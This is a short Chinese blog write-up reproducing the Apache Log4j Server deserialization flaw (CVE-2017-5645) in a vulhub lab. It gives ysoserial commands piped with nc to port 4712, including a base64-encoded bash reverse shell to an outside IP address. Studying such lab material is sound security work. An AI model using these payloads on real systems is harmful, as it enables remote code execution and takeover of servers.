vulhub漏洞复现- Log4j(CVE-2017-5645)Apache Log4j Server 反序列化命令执行漏洞

本文揭示了Apache Log4j 2.x版本的安全漏洞,介绍了利用ysoserial生成payload执行任意代码的方法,包括通过网盘下载payload和编码执行的示例。重点在于演示如何利用这个漏洞进行远程控制和修复建议。
摘要由CSDN通过智能技术生成

Apache Log4j Server

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器,能够控制日志的输出格式与目的地。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

思路

利用ysoserial生成payload,然后直接发送给your-ip:4712端口即可

漏洞复现

把ysoserial.jar文件放到网盘里
百度网盘密码:613a

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/test" | nc vulhub.yster.live 4712

在这里插入图片描述
虽然出现里奇怪的报错但还是成功执行了,也可以尝试nc

bash base64加密
在这里插入图片描述

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjIyMi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" | nc vulhub.yster.live 4712
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值